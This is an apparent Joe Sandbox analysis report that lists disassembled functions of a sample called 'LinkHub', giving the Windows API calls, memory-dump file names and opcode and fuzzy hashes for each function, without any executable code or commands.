Function 00E5B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E5B10C
Process32FirstW.KERNEL32(00000000,?), ref: 00E5B11A

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Process32NextW.KERNEL32(00000000,?), ref: 00E5B1FC
CloseHandle.KERNEL32(00000000), ref: 00E5B20B

Part of subcall function 00DEE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E14D73,?), ref: 00DEE395

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: b684cc628a6de44c10918b2d73063e0633226f0a558234608bee03de9de74b27
Instruction ID: 326db79f7f5a3ef60d3d75067f501d8a7c2b8309bbedf0494c45a72f41ced7c8
Opcode Fuzzy Hash: b684cc628a6de44c10918b2d73063e0633226f0a558234608bee03de9de74b27
Instruction Fuzzy Hash: 7E513D71908300AFD710EF25D886A5BBBE8FF89754F40491EF98597251EB70D908CBA2

Function 00E11711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E11840

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a6320ad31f60dc1145e7c81a8b99a7082bb5093df8dd47fb5ce741135a5e0f3c
Instruction ID: b3f6dffa9dda3066145468efcdc931a2c82974301346dc095802237610a2cc73
Opcode Fuzzy Hash: a6320ad31f60dc1145e7c81a8b99a7082bb5093df8dd47fb5ce741135a5e0f3c
Instruction Fuzzy Hash: 98416C32A00104ABDB247FB99C45BFE3AE4EF42330F1492A6F714F62D2DA7449C14671

Function 00E52533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00E5255A
WSAGetLastError.WSOCK32 ref: 00E52568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E525E7
WSAGetLastError.WSOCK32 ref: 00E525F1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: bb923315455a4a0dce57a4c4a9ca0e6e8a58b0550bfda13b85018ee3a0e172fb
Instruction ID: ba74be667b4b545785940992bddd0c8f3505e6221293a99c4eae10b774f84349
Opcode Fuzzy Hash: bb923315455a4a0dce57a4c4a9ca0e6e8a58b0550bfda13b85018ee3a0e172fb
Instruction Fuzzy Hash: 9541B534B002006FE720AF24C886F2A7795EB45758F54C44DF9169F3D2D7B2ED458BA1

Function 00E66CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E66D1A
ScreenToClient.USER32(?,?), ref: 00E66D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E66DBA

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 1a95e02403fad6b6dfc13b87ca83b8851963ea54b32a39df2f52c18bd617a0de
Instruction ID: 8504acb2b475c3eb1bc76b6ea51a57eb35089e53f5c50016eccdb47ad49eca44
Opcode Fuzzy Hash: 1a95e02403fad6b6dfc13b87ca83b8851963ea54b32a39df2f52c18bd617a0de
Instruction Fuzzy Hash: 5D516134A10209EFCF14DF68E8809AE7BB6FF943A4F109159F915B7290D731AE41CB50

Function 00E0B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f842b5379fad2d5e04e7d62dcec1608cb5ddff44fae31bae5eea3ac49677ee7
Instruction ID: 5c7d91708aba47ff1f53c7422cbff85f606ffec1b182a10e980f9e1b681dbb5e
Opcode Fuzzy Hash: 1f842b5379fad2d5e04e7d62dcec1608cb5ddff44fae31bae5eea3ac49677ee7
Instruction Fuzzy Hash: C841D671900704AFD728AF78CC45BAABBEDFB84710F10D52EE111EB2E1D771998187A0

Function 00E4611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E461C8
GetLastError.KERNEL32(?,00000000), ref: 00E461EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E46213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E4623F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: e7d6eb2fe33cee0ac6d91317d54f5be144ac8db0e27ace9ccf1f0f553e36d12e
Instruction ID: 848fd1f7a85ad9aa4f045ff8703f95955cb89c75a750002b0167f8a05d75edff
Opcode Fuzzy Hash: e7d6eb2fe33cee0ac6d91317d54f5be144ac8db0e27ace9ccf1f0f553e36d12e
Instruction Fuzzy Hash: C1414A35600611DFCB21EF15C945A1ABBF2EF89714B188489F84AAB362CB71FC01DFA1

Function 00E3B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E3B473
SetKeyboardState.USER32(00000080), ref: 00E3B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E3B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E3B54F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e8a3d5a457b6b7303c94d3a6e2333cfa9a3255984759676bb99e36778b103bac
Instruction ID: b0af21cd84b19e5d96172ff4d81b0e58cdf1e999d4268a178f9dd015cd1221d4
Opcode Fuzzy Hash: e8a3d5a457b6b7303c94d3a6e2333cfa9a3255984759676bb99e36778b103bac
Instruction Fuzzy Hash: 35311670A44208AEFF308A259C0D7FA7FB6AB48314F08621AE6A7B61D2D7748985C755

Function 00E3B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E3B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00E3B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00E3B63B
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E3B68D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3fc73d1f4a469969180b063d49c1007e8e894078bd2383f6463f3094d67cb57c
Instruction ID: d166bb470930226043fdf4111065ee7ae2f0598f5e42c1ff5d2824cc235ded36
Opcode Fuzzy Hash: 3fc73d1f4a469969180b063d49c1007e8e894078bd2383f6463f3094d67cb57c
Instruction Fuzzy Hash: 6D310B30A44608AEFF208B658C0E7FF7FA6AF85314F44522AE586B61D2C7748A45CB52

Function 00E680AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00E680D4
GetWindowRect.USER32(?,?), ref: 00E6814A
PtInRect.USER32(?,?,?), ref: 00E6815A
MessageBeep.USER32(00000000), ref: 00E681C6

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 1169f19768537c92a89a3232246a5db773e326db8230864f662c7c95b43fd0ba
Instruction ID: ab6b4eb16a205371d016c52ac3777b311c2b40f6969351c82c41b937e97f753d
Opcode Fuzzy Hash: 1169f19768537c92a89a3232246a5db773e326db8230864f662c7c95b43fd0ba
Instruction Fuzzy Hash: 7C410230A42214DFCB11CF59E984AAA77F5FF4A794F1452A8EA40BB260CB70E846CB40

Function 00E62176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00E62187

Part of subcall function 00E34393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E343AD
Part of subcall function 00E34393: GetCurrentThreadId.KERNEL32 ref: 00E343B4
Part of subcall function 00E34393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E32F00), ref: 00E343BB

GetCaretPos.USER32(?), ref: 00E6219B
ClientToScreen.USER32(00000000,?), ref: 00E621E8
GetForegroundWindow.USER32 ref: 00E621EE

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 0717a763c2d70f0bf56facfe100d44bd77e5997fd9aad85fb0a3da6429f8cbfa
Instruction ID: 39b79a8dd8106b04ad2e7e8fbe69f2c4f6052bac884911c6645c84f42088fffd
Opcode Fuzzy Hash: 0717a763c2d70f0bf56facfe100d44bd77e5997fd9aad85fb0a3da6429f8cbfa
Instruction Fuzzy Hash: B93152B1E05509AFC704EFA6C881CAEBBF8EF48304B50446AE515E7351DB71EE45CBA0

Function 00E3E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00DD41EA: _wcslen.LIBCMT ref: 00DD41EF

_wcslen.LIBCMT ref: 00E3E8E2
_wcslen.LIBCMT ref: 00E3E8F9
_wcslen.LIBCMT ref: 00E3E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E3E92F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 6a0131ba06225b45b92d96b3b0b1de2f05b96da966337d287b1edf3a93c3a8fa
Instruction ID: 1e6544831597b6329e739cdb848b5d952d8e4266768326108cdda01dbd1daa2f
Opcode Fuzzy Hash: 6a0131ba06225b45b92d96b3b0b1de2f05b96da966337d287b1edf3a93c3a8fa
Instruction Fuzzy Hash: AA21B171D00318AFCB10AFA4D981BBEBBB9EF95350F1590A5E904BB381D6709E41CBB1

Function 00E3DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00E6DC30), ref: 00E3DBA6
GetLastError.KERNEL32 ref: 00E3DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E3DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E6DC30), ref: 00E3DC21

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: c353b142e0e13d7a35bc477036ce008e42792cdd56c39a1a7f08b7f4ff943a25
Instruction ID: 681843a098dd7e6ae62ce5ca2e4a3998ea87fb4b666fcba2aff2b809ab7ddd37
Opcode Fuzzy Hash: c353b142e0e13d7a35bc477036ce008e42792cdd56c39a1a7f08b7f4ff943a25
Instruction Fuzzy Hash: A221A03050C2059F8700DF29EC8499BBBE8EF59368F502A1AF499A32A1D770D94ACB52

Function 00E6321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00E632A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E632C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E632CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E632DC

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: b7ceb26511033224fb9c2b6fcfd8ce19e3882d54ca367f1c3b20cea43f263106
Instruction ID: 3d40df5c1a3e17b0f25cb0e4f61e88885d4b720f7bdb0e2a78572cac296e02e4
Opcode Fuzzy Hash: b7ceb26511033224fb9c2b6fcfd8ce19e3882d54ca367f1c3b20cea43f263106
Instruction Fuzzy Hash: 3B213631748111AFD7149B25DC54FAABB95FF81364F248209F8269B2E2C771ED41CBD0

Function 00E3825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E396E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E38271,?,000000FF,?,00E390BB,00000000,?,0000001C,?,?), ref: 00E396F3
Part of subcall function 00E396E4: lstrcpyW.KERNEL32(00000000,?,?,00E38271,?,000000FF,?,00E390BB,00000000,?,0000001C,?,?,00000000), ref: 00E39719
Part of subcall function 00E396E4: lstrcmpiW.KERNEL32(00000000,?,00E38271,?,000000FF,?,00E390BB,00000000,?,0000001C,?,?), ref: 00E3974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E390BB,00000000,?,0000001C,?,?,00000000), ref: 00E3828A
lstrcpyW.KERNEL32(00000000,?,?,00E390BB,00000000,?,0000001C,?,?,00000000), ref: 00E382B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00E390BB,00000000,?,0000001C,?,?,00000000), ref: 00E382EB

Strings

cdecl, xrefs: 00E382E2

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: b3ae199c42ae9d49e61466e7a1040d83ed44825fe5e948fe60ba83463b2726d9
Instruction ID: 6659284e97d1cfee3df08e1fb0a4c44c7e8f478ce238117ca56344f98af6c4ad
Opcode Fuzzy Hash: b3ae199c42ae9d49e61466e7a1040d83ed44825fe5e948fe60ba83463b2726d9
Instruction Fuzzy Hash: 9A11B17A200341ABCB149F39DC49A7A7BE9FF89754B50902AF942D7260EF719811C7A0

Function 00E660FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00E6615A
_wcslen.LIBCMT ref: 00E6616C
_wcslen.LIBCMT ref: 00E66177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00E662B5

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: ba94e40cfbdfd3d954a87ff0bc31ba92a7cc228f93dfdd2a971a0db7a85321a3
Instruction ID: 85b36a4de943b953708df08e28137eabf711413a7f633908f9413aab9e06afa5
Opcode Fuzzy Hash: ba94e40cfbdfd3d954a87ff0bc31ba92a7cc228f93dfdd2a971a0db7a85321a3
Instruction Fuzzy Hash: E511E431690208AADB10DF65AC84AEF77BCEB223D4F10502AFA15F5081E770C944CAB0

Function 00E02079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b73a94377f2b564d9641b43bfa890f85bbd6b67ffc4a72190268081b6401f05
Instruction ID: 53e8ed47c70f32e94e0e3755f7cb8dc22faf593b18ac1e8315beb92b4570bb9c
Opcode Fuzzy Hash: 3b73a94377f2b564d9641b43bfa890f85bbd6b67ffc4a72190268081b6401f05
Instruction Fuzzy Hash: DB018FB26093167EFA2126786CC8F67668DDF423B8B346329B621B11D5DAA08CC09160

Function 00E32374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00E32394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E323A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E323BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E323D7

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ac0967a4f1d04aa05192dff5b18028ec5820ca2734f13cfeb7e1d15c07402b8a
Instruction ID: eed620b21b2e19c334d2872e5c89e562e9e46c114d043d3e5255750aed09aaf5
Opcode Fuzzy Hash: ac0967a4f1d04aa05192dff5b18028ec5820ca2734f13cfeb7e1d15c07402b8a
Instruction Fuzzy Hash: 97113C36900219FFDB119B95CD85F9DBB78FB48750F200095E600B7290D6716E10DB94

Function 00E3EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E3EB14
MessageBoxW.USER32(?,?,?,?), ref: 00E3EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E3EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E3EB64

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
